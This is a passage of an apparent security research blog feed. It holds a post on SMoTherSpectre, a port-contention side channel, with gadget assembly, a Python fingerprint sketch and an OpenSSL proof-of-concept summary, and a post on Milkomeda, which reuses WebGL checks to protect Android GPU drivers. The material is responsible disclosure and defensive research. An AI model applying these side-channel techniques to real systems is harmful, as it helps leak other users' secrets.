&lt;p&gt;[PSP18] Hui Peng and Yan Shoshitaishvili and Mathias Payer. T-Fuzz: fuzzing by program transformation. In IEEE Security and Privacy 2018.&lt;/p&gt;
&lt;p&gt;[ISM+18] Insu Yun and Sangho Lee and Meng Xu and Yeongjin Jang and Taesoo Kim. QSYM: A Practical Concolic Execution Engine Tailored for Hybrid Fuzzing. In Usenix SEC 2018.&lt;/p&gt;
&lt;p&gt;[KRC+18] George Klees and Andrew Ruef and Benji Cooper and Shiyi Wei and Michael Hicks. Evaluating Fuzz Testing. In ACM CCS 2018.&lt;/p&gt;</content><category term="Security"></category><category term="Fuzzing"></category></entry><entry><title>SMoTherSpectre: transient execution attacks through port contention</title><link href="/blog/2019/20190306-SMoTherSpectre.html" rel="alternate"></link><published>2019-03-06T16:22:00-05:00</published><updated>2019-03-06T16:22:00-05:00</updated><author><name>Atri Bhattacharyya</name></author><id>tag:None,2019-03-06:/blog/2019/20190306-SMoTherSpectre.html</id><summary type="html">&lt;p&gt;Side channel attacks such as Spectre or Meltdown allow data leakage from an
unwilling process. Until now, transient execution side channel attacks
primarily leveraged cache-based side channels to leak information. The very
purpose of a cache, that of providing faster access to a subset of data, enables
information leakage.  While …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Side channel attacks such as Spectre or Meltdown allow data leakage from an
unwilling process. Until now, transient execution side channel attacks
primarily leveraged cache-based side channels to leak information. The very
purpose of a cache, that of providing faster access to a subset of data, enables
information leakage.  While the world focused on a string of exploits leveraging
caches (and the memory hierarchy pyramid) and defenders tried to block data
leakage through it, we look at the core tenet enabling the channel: contention.&lt;/p&gt;
&lt;p&gt;&lt;img alt="SMoTherSpectre: transient execution side channel based on port
contention" style="float: left;" src="/blog/static/2019/0306/smotherspectre.png"/&gt;&lt;/p&gt;
&lt;p&gt;Contention in a CPU is not limited to cache capacity; it manifests itself in a
variety of forms when resources are shared. Freely sharing resources among
untrusted entities allows an attacker process to infer when another (victim)
process is contending for the resource, thereby slowing down the attacker.&lt;/p&gt;
&lt;p&gt;A less obvious form of contention arises in Simultaneously Multi-Threaded (SMT)
cores, which lay the foundation for nearly all modern x86 CPUs, IBM POWER8,
Oracle T5, and Cavium ThunderX2/X3. In SMT, scheduling units called ports are
shared among threads of execution, and this sharing can be exploited to leak information.
Port contention as a phenomenon has been previously discussed by Anders Fogh in
his 2016 &lt;a href="https://cyber.wtf/2016/09/27/covert-shotgun/"&gt;blog post&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We precisely characterize the port-induced side channel (that we call &lt;em&gt;SMoTher&lt;/em&gt;)
and demonstrate that it is possible to detect a sequence as small as a single
(schedulable) instruction tied at design time to a specific subset of ports by
leveraging contention. Leveraging SMoTher (instead of a cache-based side
channel), we present a powerful, practical transient execution attack to leak
secrets that may be held in registers or the closely-coupled L1 cache, called
SMoTherSpectre. The full paper is on &lt;a href="https://arxiv.org/abs/1903.01843"&gt;arXiv&lt;/a&gt;,
the work is a collaboration between the EPFL &lt;a href="https://hexhive.epfl.ch"&gt;HexHive&lt;/a&gt;
and &lt;a href="https://parsa.epfl.ch"&gt;PARSA&lt;/a&gt; labs, and &lt;a href="https://www.zurich.ibm.com/systemsecurity/"&gt;IBM Research
Zurich&lt;/a&gt; and joint work between Atri
Bhattacharyya, Alexandra Sandulescu, Matthias Neugschwandtner, &lt;a href="http://ale.sopit.net/"&gt;Alessandro
Sorniotti&lt;/a&gt;, &lt;a href="https://people.epfl.ch/babak.falsafi"&gt;Babak
Falsafi&lt;/a&gt;, &lt;a href="https://nebelwelt.net"&gt;Mathias
Payer&lt;/a&gt;, and &lt;a href="https://twitter.com/kurmus"&gt;Anil Kurmus&lt;/a&gt;.&lt;/p&gt;
&lt;h1&gt;Simultaneous multi-threading and scheduling&lt;/h1&gt;
&lt;p&gt;A Simultaneously Multi-threaded (SMT) CPU fetches and executes instructions for
more than one thread on the same core. To the operating system/user, it appears
as a greater number of &lt;em&gt;logical&lt;/em&gt; cores than &lt;em&gt;physical&lt;/em&gt; cores. The former is used
to denote the capability to execute a thread, while the latter is the physical
implementation of a unit (execution pipeline, registers, caches) called a core.
These (colocated) threads have a few dedicated components per thread (fetch unit
and architectural registers), while sharing the rest of the pipeline (branch
predictors, reservation station, ports, execution units). Implementations differ
in which components are shared or dedicated and the number of threads per
physical core.&lt;/p&gt;
&lt;p&gt;A typical modern, out-of-order processor schedules micro-ops from a unified
reservation station to specialized execution units. See &lt;a href="https://fenix.tecnico.ulisboa.pt/downloadFile/1689468335556986/Lesson\%2013\%20-\%20Modern\%20Intel\%20Processors.pdf"&gt;this
presentation&lt;/a&gt;
for an overview of scheduling on recent Intel microarchitectures.  Core-series
processors contain 5-8 ports to perform this scheduling. Each port is
responsible for a fixed subset of execution units. Intel Skylake processors,
specifically, contain eight ports. Four of them (0,1,5 and 6) are used to
schedule operations to integer, floating-point, vector execution units among
others. The other four ports handle loads, stores, and address generation
operations. The execution units for the most commonly executed micro-ops are
replicated and associated with multiple ports. With SMT, micro-ops from both
co-located threads may reside in the same reservation station(s). In each cycle,
a single micro-op from either thread may be scheduled by each port. See
&lt;a href="https://en.wikichip.org/w/images/thumb/3/32/skylake_scheduler.svg/500px-skylake_scheduler.svg.png"&gt;scheduling Ports on Intel Skylake
processors&lt;/a&gt;
for details of Intel Skylake scheduling.&lt;/p&gt;
&lt;h1&gt;SMoTher&lt;/h1&gt;
&lt;p&gt;When SMT threads have ready micro-ops which can use the same port, they must
contend for it each cycle. A thread must wait whenever the contended port
chooses to schedule a micro-op from the other thread,
causing a slowdown. This slowdown is detectable (by taking timestamps using
&lt;code&gt;rdtsc&lt;/code&gt; on Intel's CPUs), and allows a specially crafted thread to measure the
co-located thread's utilization of a port.&lt;/p&gt;
&lt;p&gt;Suppose threads A (Attacker) and V (Victim) run on the same physical Skylake
core, where &lt;code&gt;crc32&lt;/code&gt; is scheduled by port 1 and &lt;code&gt;fadd&lt;/code&gt; is scheduled by port 5. If
thread V only uses other ports (for example, running &lt;code&gt;fadd&lt;/code&gt;s), thread A running 20
one-cycle &lt;code&gt;crc32&lt;/code&gt; instructions should require 20 cycles. However, if the
reservation station also contains a single ready &lt;code&gt;crc32&lt;/code&gt; instruction from
thread V, there should be one cycle where port 1 chooses it over the micro-ops
from A. Overall, thread A now runs the same sequence in 21 cycles, which is a
5% slowdown. Longer sequences with contention have led to attacker slowdowns of
up to 35% in our experiments.&lt;/p&gt;
&lt;p&gt;Each instruction in a sequence of code can be scheduled on specific ports. This
allows us to create a &lt;em&gt;port-fingerprint&lt;/em&gt; for every sequence, consisting of the
expected utilization of each of the ports while scheduling that sequence. For a
pair of victim sequences, V_a and V_b, with different &lt;em&gt;port-fingerprints&lt;/em&gt;, a
carefully crafted attacker thread can identify which victim sequence is
concurrently run. Essentially, the attacker chooses one or more ports for which
the victim sequences' fingerprints differ. By timing instructions
specifically scheduled on these ports, the attacker can measure contention.
Higher contention means that a concurrent victim is using the same ports (and
vice versa), identifying the sequence. We call such pairs of instruction
sequences &lt;em&gt;SMoTher-differentiable&lt;/em&gt;.&lt;/p&gt;
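&lt;p&gt;The fingerprinting step can be sketched as follows (illustrative Python; the tiny port map covers only the instructions mentioned in this post and is a stand-in for a full per-microarchitecture table):&lt;/p&gt;

```python
# Port assignments for a few Skylake instructions discussed in this post.
PORTS = {"crc32": {1}, "ror": {0, 6}, "fadd": {5}}

def fingerprint(seq):
    """Expected per-port utilization of an instruction sequence; an
    instruction that may issue on several ports contributes fractionally
    to each of them."""
    fp = {}
    for insn in seq:
        ports = PORTS[insn]
        for p in ports:
            fp[p] = fp.get(p, 0.0) + 1.0 / len(ports)
    return fp

def distinguishing_ports(seq_a, seq_b):
    """Ports where the fingerprints differ: timing instructions pinned to
    these ports tells an attacker which sequence ran concurrently. The
    sequences are SMoTher-differentiable iff this set is non-empty."""
    fa, fb = fingerprint(seq_a), fingerprint(seq_b)
    return {p for p in set(fa) | set(fb) if fa.get(p, 0.0) != fb.get(p, 0.0)}
```

&lt;p&gt;For a crc32-only sequence against a ror-only sequence, the distinguishing ports are 0, 1, and 6.&lt;/p&gt;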
&lt;p&gt;To leak information, we look at data-dependent control flow (conditional
branches) leading to SMoTher-differentiable sequences (as branch target and
fallthrough). We call this a &lt;em&gt;SMoTher-gadget&lt;/em&gt;. The attacker can identify the
sequence following the branch, and thereby infer the outcome of the condition.
The information leaked depends on the branch condition. Common examples include
specific bits in registers or memory (for example, &lt;code&gt;TEST 0x1, al; jz TGT&lt;/code&gt;, or
&lt;code&gt;CMPB 0x0, (rdx); jl TGT&lt;/code&gt;).&lt;/p&gt;
&lt;h1&gt;SMoTherSpectre&lt;/h1&gt;
&lt;p&gt;SMoTherSpectre is a speculative code-reuse attack. Speculative execution at
particular points of a victim's execution is influenced to execute
SMoTher-gadgets, leaking information.&lt;/p&gt;
&lt;p&gt;As an example, an attacker can use branch target injection (BTI) to redirect the
speculative execution following an indirect jump/call (until the target is
calculated) on a co-located victim process (shared branch predictor). This code
sequence, including the indirect branch, is named the &lt;em&gt;BTI gadget&lt;/em&gt;. At this
point, we require a register or a memory location (with a pointer to it) to hold
the secret to be leaked. The code below is an example BTI gadget, where a secret
is loaded into  &lt;code&gt;rdi&lt;/code&gt; and the indirect jump will eventually branch to the
pointer target loaded into &lt;code&gt;rax&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="nf"&gt;BTI&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="no"&gt;gadget&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;load&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="no"&gt;rdi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;secret&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;load&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="no"&gt;rax&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;pointer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;jmp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;rax&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;The &lt;em&gt;poisoned&lt;/em&gt; target leads the victim to execute a different data-dependent
control-flow sequence--i.e., a conditional branch--somewhere in the victim code.
The condition must use the secret, so that the branch leaks the outcome of the
condition if the attacker can figure out which instructions the victim executed
just afterwards (i.e., either the branch target or the fall-through). For
SMoTher-gadgets, conditional branches where the two subsequent paths are
SMoTher-differentiable, the attacker can figure out if the branch was taken or
not taken by introducing contention on one or more ports which the target and
fallthrough use for a different number of cycles. In the SMoTher-gadget shown
below, &lt;code&gt;crc32&lt;/code&gt; is scheduled by port 1 on Skylake, while &lt;code&gt;ror&lt;/code&gt; is scheduled on
ports 0 and 6. &lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="nf"&gt;SMoTher&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="no"&gt;gadget&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;cmp&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="no"&gt;rdi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;jl&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;mark&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;crc32&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;crc32&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="na"&gt;...&lt;/span&gt;
&lt;span class="nl"&gt;mark:&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;ror&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;ror&lt;/span&gt;
&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="na"&gt;...&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;An attacker running a sequence of &lt;code&gt;crc32&lt;/code&gt; instructions will contend on port 1
&lt;em&gt;if&lt;/em&gt; the victim branch falls though and runs &lt;code&gt;crc32&lt;/code&gt; instructions too. The
slowdown due to contention can be detected by the attacker, using &lt;code&gt;rdtsc&lt;/code&gt;
timestamps to count the number of cycles taken to run its sequence, and allows
it to infer that the victim's secret is &lt;em&gt;not&lt;/em&gt; less than 0.&lt;/p&gt;
&lt;h2&gt;Gadgets&lt;/h2&gt;
&lt;p&gt;SMoTherSpectre requires two gadgets in the victim code base:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;A BTI gadget (to trigger speculation):&lt;/em&gt;
   C/C++ compilers typically use indirect call instructions to implement calls
   using function pointers/virtual-function calls in code which does not deploy
   &lt;em&gt;retpoline&lt;/em&gt; defences. OpenSSL's EVP library uses such a pointer to, e.g.,
   encrypt/decrypt using the selected cipher.&lt;br&gt;
&lt;code&gt;i = ctx-&amp;gt;cipher-&amp;gt;do_cipher(ctx, out, in, inl);&lt;/code&gt;&lt;br&gt;
   Further, a secret argument may be held in registers. In the example above,
   register &lt;code&gt;rdx&lt;/code&gt; holds a pointer to the secret plaintext being encrypted.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;A SMoTher gadget (to leak the secret):&lt;/em&gt;
   Every conditional branch in a victim's binary is a potential SMoTher gadget.
   In fact, even unintended sequences which may be interpreted as a conditional
   jump can be used (similar to ROP). However, an attacker needs to be able to
   differentiate between the target and fallthrough sequences using port contention.
   It turns out that hundreds to thousands of such sequences exist in &lt;code&gt;glibc&lt;/code&gt; (with
   different degrees of SMoTher-differentiability). The paper describes in more
   detail our methodology for finding and ranking SMoTher-gadgets.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The vast availability of SMoTher gadgets makes SMoTherSpectre such a powerful
attack. While the first stage is similar to other speculative execution attacks,
the side channel to leak information is different and more readily available
than cache-based side channels. While each step leaks only one bit of
information (the conditional branch that depends on the secret value was taken
or not taken), SMoTher-gadgets are plentiful and can be combined
to leak information.&lt;/p&gt;
&lt;h2&gt;Evaluation&lt;/h2&gt;
&lt;p&gt;&lt;img alt="PoC gadgets." src="/blog/static/2019/0306/pocgadgets.png"&gt;&lt;/p&gt;
&lt;p&gt;We release the &lt;a href="https://github.com/HexHive/SMoTherSpectre"&gt;proof of concept
code&lt;/a&gt; to enable other researchers to
reproduce, evaluate, and assess this side channel. It uses the gadgets described
above. Separate processes are used for the attacker and victim. Per iteration of
the experiment, a randomly-generated bit (representing the victim's secret) is
written by the victim process to a file, while the attacker writes its guess to
another file. For each secret, we repeat the attack multiple times to allow the
attacker to get multiple samples. Multiple samples allow the attacker to
eliminate some of the noise that invariably creeps into a timing experiment at
such fine granularity. We run 1,000 iterations and compare the files in
post-processing to calculate the attacker's accuracy in guessing the secret. &lt;/p&gt;
&lt;p&gt;&lt;img alt="Timing histogram for crc32." src="/blog/static/2019/0306/crc32histogram.png"&gt;&lt;/p&gt;
&lt;p&gt;The histogram of the attacker's timing for the &lt;code&gt;crc32&lt;/code&gt; sequence in the SMoTher
phase shows separate plots for when the actual secret is zero or one.
Specifically, the attacker's timing is the average over 9 runs with the same
secret. This figure clearly shows that an attacker can use a threshold of 94
cycles to make a guess of the secret with high confidence.&lt;/p&gt;
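&lt;p&gt;The resulting decision procedure is a simple threshold classifier (illustrative Python; the 94-cycle threshold is the one read off the histogram, and the averaging mirrors the 9-sample runs):&lt;/p&gt;

```python
def guess_contention(samples, threshold=94):
    """Average the attacker's timing samples and guess that the victim
    contended on the measured port (i.e., executed the crc32 side of the
    branch) when the mean exceeds the threshold."""
    return sum(samples) / len(samples) >= threshold
```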
&lt;p&gt;Overall, our attacker was able to guess the secret with an accuracy from 60%
(with one sample) to 98% (with 9 samples).&lt;/p&gt;
&lt;h3&gt;OpenSSL exploit&lt;/h3&gt;
&lt;p&gt;We also created a proof-of-concept exploit for OpenSSL's (commit &lt;code&gt;f1d49ed&lt;/code&gt;, dated
27-Nov-2018) high level EnVeloP (EVP) API. We modelled a victim program using
OpenSSL to encrypt data. Specifically, the program calls &lt;code&gt;EVP_EncryptUpdate&lt;/code&gt; to
encrypt chunks of data. An indirect call in the function serves as our BTI
gadget.&lt;/p&gt;
&lt;p&gt;At the BTI gadget, the register &lt;code&gt;rdx&lt;/code&gt; holds a pointer to the plaintext being
encrypted (victim secret). A SMoTher-gadget from &lt;code&gt;glibc&lt;/code&gt; is used, comparing the
first byte in memory referenced by &lt;code&gt;rdx&lt;/code&gt; against zero. In effect, this is
leaking information about the first byte of the plaintext.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Attack distribution for OpenSSL." src="/blog/static/2019/0306/opensslattack.png"&gt;&lt;/p&gt;
&lt;p&gt;The distributions of the attacker's timings for different secret values are
distinguishable by statistical tests such as Student's t-test, implying that an
attacker who can observe multiple encryption runs of the same plaintext can
identify the secret.&lt;/p&gt;
&lt;h1&gt;Mitigation&lt;/h1&gt;
&lt;p&gt;Mitigating SMoTherSpectre is possible by mitigating the port contention side
channel or the transient execution side channel (BTI in our PoC).&lt;/p&gt;
&lt;p&gt;There are a range of mitigations for BTI (commonly known as Spectre v2
mitigations), including enabling the Single Thread Indirect Branch Predictors
(STIBP) feature on Intel processors. We observed that Intel's microcode updates
(https://downloadcenter.intel.com/search?keyword=linux+microcode) dated
2017-07-07 and later prevented BTI in our released PoC
code. All security-critical userspace programs should be compiled with
&lt;em&gt;retpolines&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;However, BTI is one of multiple avenues for influencing indirect branches (or
returns) on victim processes. Newer Spectre variants continue to propose
alternate methods for influencing branch speculation. Therefore, defense against
SMoTher is required to fully mitigate this transient execution attack.&lt;/p&gt;
&lt;p&gt;The general idea of preventing SMoTher leaking information is to ensure that two
threads with different privileges (in the general sense) do not compete for the
same execution port. An obvious scenario is threads from separate users sharing
a physical core. However, in certain cases, threads from the same Linux &lt;code&gt;user&lt;/code&gt;
can represent different mutually-untrusting entities. Therefore, the strongest
defence is disabling simultaneous multi-threading.&lt;/p&gt;
&lt;h1&gt;Disclosure&lt;/h1&gt;
&lt;p&gt;We discovered the SMoTher side channel in June 2018 and developed the
SMoTherSpectre speculative side channel proof of concept in November 2018. The
co-authors at IBM Research disclosed the findings internally to IBM. We
disclosed the vulnerability to Intel (on December 05, 2018) and to OpenSSL (on
December 05, 2018). AMD was also notified as part of IBM's internal disclosure
process. After acknowledging receipt of our PoC, neither Intel nor OpenSSL
provided further feedback. The IBM internal disclosure process completed on
February 28, 2019 and we are releasing the details of the vulnerability on March
06, 2019.&lt;/p&gt;
&lt;p&gt;The full paper is on &lt;a href="https://arxiv.org/abs/1903.01843"&gt;arXiv&lt;/a&gt;. The &lt;a href="https://github.com/HexHive/SMoTherSpectre"&gt;PoC
code&lt;/a&gt; enables reproduction. Contact:
&lt;a href="mailto:mathias.payer@epfl.ch"&gt;Mathias Payer&lt;/a&gt; or &lt;a href="https://twitter.com/gannimo"&gt;@gannimo on
Twitter&lt;/a&gt;.&lt;/p&gt;</content><category term="Security"></category><category term="SMoTher"></category><category term="port contention"></category><category term="speculation"></category><category term="side channel"></category></entry><entry><title>Milkomeda: colliding galaxies or how to repurpose security checks across domains</title><link href="/blog/2019/0102-Milkomeda.html" rel="alternate"></link><published>2019-01-02T16:18:00-05:00</published><updated>2019-01-02T16:18:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2019-01-02:/blog/2019/0102-Milkomeda.html</id><summary type="html">&lt;p&gt;On one hand, GPUs expose broad functionality for graphics and machine learning
workloads, on the other hand, this functionality may be exploited due to large
amounts of unvetted code, complex functionality, and the information gap between
user-space application, kernel, and the auxiliary GPU. We introduce a novel
framework that allows …&lt;/p&gt;</summary><content type="html">&lt;p&gt;On one hand, GPUs expose broad functionality for graphics and machine learning
workloads; on the other hand, this functionality may be exploited due to large
amounts of unvetted code, complex functionality, and the information gap between
user-space application, kernel, and the auxiliary GPU. We introduce a novel
framework that allows repurposing of WebGL security checks from the Chrome
browser to protect the Android kernel against active exploitation from malicious
apps at low performance overhead.&lt;/p&gt;
&lt;p&gt;This post discusses the &lt;a class="reference external" href="https://github.com/trusslab/milkomeda"&gt;open-source release&lt;/a&gt; of our &lt;a class="reference external" href="http://nebelwelt.net/publications/files/18CCS2.pdf"&gt;CCS'18 Milkomeda paper&lt;/a&gt;. This is joint work
between Zhihao Yao, Saeed Mirzamohammadi, &lt;a class="reference external" href="https://www.ics.uci.edu/~ardalan/"&gt;Ardalan Amiri Sani&lt;/a&gt;, and Mathias Payer.&lt;/p&gt;
&lt;div class="section" id="new-usage-scenarios-result-in-new-threats"&gt;
&lt;h2&gt;New usage scenarios result in new threats&lt;/h2&gt;
&lt;p&gt;With the rise of machine learning workloads and modern games that require
powerful computation, GPUs have become massively parallel computing co-processors
that expose a complex and versatile interface. This complex interface enables
the flexibility and performance required by modern workloads but increases the
attack surface. Current operating systems do not enforce scheduling and
privilege separation between different GPU workloads. The operating system
simply exposes the interface to user-space programs, enabling them to use the
vast functionality of the hardware at low overhead.&lt;/p&gt;
&lt;p&gt;In the intended usage scenario, a user-space library provides access to GPU
functionality and calls into the kernel driver, which forwards the data to the
GPU, where the computation is executed. This scenario exposes bugs at three
different locations. First, the user-space library may be buggy, crashing the
calling process. Second, the kernel driver may be buggy, crashing the kernel
(and all processes). Third, the code running on the GPU may be buggy, crashing
the GPU (and all kernels currently running on the GPU). It is interesting to
note that a user-space program is not restricted to the functionality exported
by the user-space library but can directly use the (often only partially
documented) functionality of the kernel driver.&lt;/p&gt;
&lt;p&gt;The original threat model focused on local applications running either gaming
or machine learning workloads. These trusted workloads may crash if they are
programmed incorrectly, but security was not a focus. With the rise of graphics
functionality in browsers, the threat model is changing. The exposed threat
surface of the GPU kernel interface has been exploited through several attacks
against, e.g., Google Chrome, where bugs in the GPU process allow further
privilege escalation.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="webgl-exposing-ioctl-to-javascript"&gt;
&lt;h2&gt;WebGL: exposing &lt;tt class="docutils literal"&gt;ioctl&lt;/tt&gt; to JavaScript&lt;/h2&gt;
&lt;p&gt;WebGL now enables untrusted websites to access the OpenGL interface
through JavaScript. While this is great news for JavaScript programmers who
want to program 3D workloads, it is terrible news for security, as a highly
complex interface is now exposed to untrusted code.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2019/0102/thisisfine.png" /&gt;&lt;/p&gt;
&lt;p&gt;(&amp;quot;This is fine&amp;quot; comic by &lt;a class="reference external" href="http://www.gunshowcomic.com/"&gt;KC Green&lt;/a&gt;.)&lt;/p&gt;
&lt;p&gt;Given the uncertain provenance of the code and the large amount of security
vulnerabilities in user-space libraries and kernel drivers, the Google Chrome
team deployed a safety net: an interposition layer that checks every GPU call
before it is sent to the GPU. A local shim library forwards the GPU call to a
separate process where the GPU state is replicated and the call is verified
given the current GPU state. After passing the checks, the call is forwarded by
the separate process to the GPU. While this adds some overhead due to the
inter-process communication (and the checks themselves), it protects the kernel
and the GPU from unvetted calls.&lt;/p&gt;
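&lt;p&gt;As a rough sketch of this interposition pattern (hypothetical call names and
state, not Chrome's actual API): the checking process mirrors the GPU state it
has seen so far and rejects any call that is inconsistent with that replicated
state.&lt;/p&gt;

```python
# Minimal sketch of a validating interposition layer (hypothetical API).
# The checker mirrors GPU state and vets every call against that replicated
# state before forwarding it to the real driver.

class GpuCallValidator:
    def __init__(self):
        self.buffers = {}  # replicated state: buffer id mapped to its size

    def create_buffer(self, buf_id, size):
        self.buffers[buf_id] = size
        return ("create_buffer", buf_id, size)  # forwarded to the driver

    def write_buffer(self, buf_id, offset, length):
        # Reject calls that reference unknown buffers ...
        if buf_id not in self.buffers:
            raise ValueError("unknown buffer")
        size = self.buffers[buf_id]
        # ... or ranges beyond the recorded buffer size
        if max(offset + length, size) != size:
            raise ValueError("out-of-bounds write")
        return ("write_buffer", buf_id, offset, length)
```

&lt;p&gt;In Chrome, the checks additionally run in a separate process, so a
compromised renderer cannot tamper with the replicated state.&lt;/p&gt;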
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2019/0102/webgl.png" /&gt;&lt;/p&gt;
&lt;p&gt;The figure above shows the Chrome WebGL security checks. WebGL calls are sent
to the secure process where they are checked and then forwarded to the kernel.&lt;/p&gt;
&lt;p&gt;These WebGL checks are limited along two dimensions. First, they are restricted
to OpenGL calls and do not cover, e.g., the CUDA computational interface (due to
both the massive additional complexity and the closed-source nature of the
computational interfaces). Second, they are incomplete. Due to the almost one-to-one
mapping between OpenGL and WebGL, the amount of functionality is massive and
checks are therefore reactive. The Chrome developers have added checks for
frequently attacked interfaces or interfaces with certain bug patterns. The
checks are continuously extended and improved, increasing the guarantees with
every release.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="android-gpu-security"&gt;
&lt;h2&gt;Android GPU security&lt;/h2&gt;
&lt;p&gt;Android is exposed to similar issues as WebGL: untrusted applications (&amp;quot;apps&amp;quot;)
access the exposed GPU interface through native libraries (hopefully the
ones supplied by the Android system) but may also access the native &lt;tt class="docutils literal"&gt;ioctl&lt;/tt&gt;
interface directly.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2019/0102/android.png" /&gt;&lt;/p&gt;
&lt;p&gt;The figure above shows the default Android security stack: OpenGL (and other
GPU) calls are never vetted and applications have direct access to the exposed
interface.&lt;/p&gt;
&lt;p&gt;The only reason we have not yet seen a large number of local privilege
escalation attacks against Android through the GPU interface is the combination
of a lack of knowledge about this interface and the availability of easier
targets. With the deployment of new defenses on Android, the GPU interface will
become a prime target.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="milkomeda-reuse-checks"&gt;
&lt;h2&gt;Milkomeda: reuse checks&lt;/h2&gt;
&lt;p&gt;We decouple the GPU interface from user-space processes and force all
interactions with the GPU through our interposition layer. The key idea of our
system is to automatically reuse the WebGL checks from Chrome, extracting them
dynamically and weaving them into our interposition layer. This allows us to
reduce the cost of check development. Additionally, new checks will be imported
automatically when they are added to Chrome, further reducing maintenance cost.&lt;/p&gt;
&lt;p&gt;For WebGL, performance is less critical than for &amp;quot;native&amp;quot; Android applications.
We therefore design and implement a safe area in the application process that
executes the GPU checks. During regular execution, the safe area remains hidden.
Through a call gate that is injected when GPU functionality is accessed,
control-flow is transferred to this safe area. All safety critical arguments are
copied into the safe area where they are checked. Non-safety critical arguments
(as specified by the checks) can remain in the process and the checks can
inspect them without additional overhead.&lt;/p&gt;
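&lt;p&gt;The copy-then-check step matters because a concurrent thread could otherwise
modify an argument between validation and use (a classic double-fetch bug). A
minimal sketch of the idea, with hypothetical names:&lt;/p&gt;

```python
# Sketch of copy-then-check: safety-critical arguments are snapshotted into
# the safe area, the snapshot is vetted, and exactly the vetted snapshot is
# forwarded, so no other thread can change the values after the check.

def call_gate(args, check, forward):
    safe_copy = dict(args)       # copy safety-critical arguments
    if not check(safe_copy):     # vet the private copy, not shared memory
        raise PermissionError("GPU call rejected")
    return forward(safe_copy)    # forward exactly what was checked
```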
&lt;p&gt;&lt;img alt="image3" src="/blog/static/2019/0102/milkomeda.png" /&gt;&lt;/p&gt;
&lt;p&gt;The figure above shows the Milkomeda layout: OpenGL calls are redirected to the
safe area where they are vetted and checked before being forwarded to the
kernel, protecting the Android system from potentially malicious applications at
low performance overhead.&lt;/p&gt;
&lt;p&gt;For more technical details and a discussion of design and implementation
trade-offs, please refer to the &lt;a class="reference external" href="http://nebelwelt.net/publications/files/18CCS2.pdf"&gt;ACM CCS'18 Milkomeda paper&lt;/a&gt;. We have also released
the full source code of our &lt;a class="reference external" href="https://github.com/trusslab/milkomeda"&gt;Milkomeda implementation on GitHub&lt;/a&gt;, ready for reproduction of
our results as well as future extensions!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Academia"></category><category term="Android"></category><category term="Chrome"></category><category term="GPU"></category><category term="privilege separation"></category><category term="security"></category></entry><entry><title>Automating data-only attacks through Block Oriented Programming (BOP)</title><link href="/blog/2018/1231-BOP.html" rel="alternate"></link><published>2018-12-31T13:40:00-05:00</published><updated>2018-12-31T13:40:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2018-12-31:/blog/2018/1231-BOP.html</id><summary type="html">&lt;p&gt;With the rise of strong control-flow defenses such as Control-Flow Integrity
(CFI), attackers will increasingly resort to data-only attacks that can be
equally powerful. Earlier research demonstrated that data-only attacks can be as
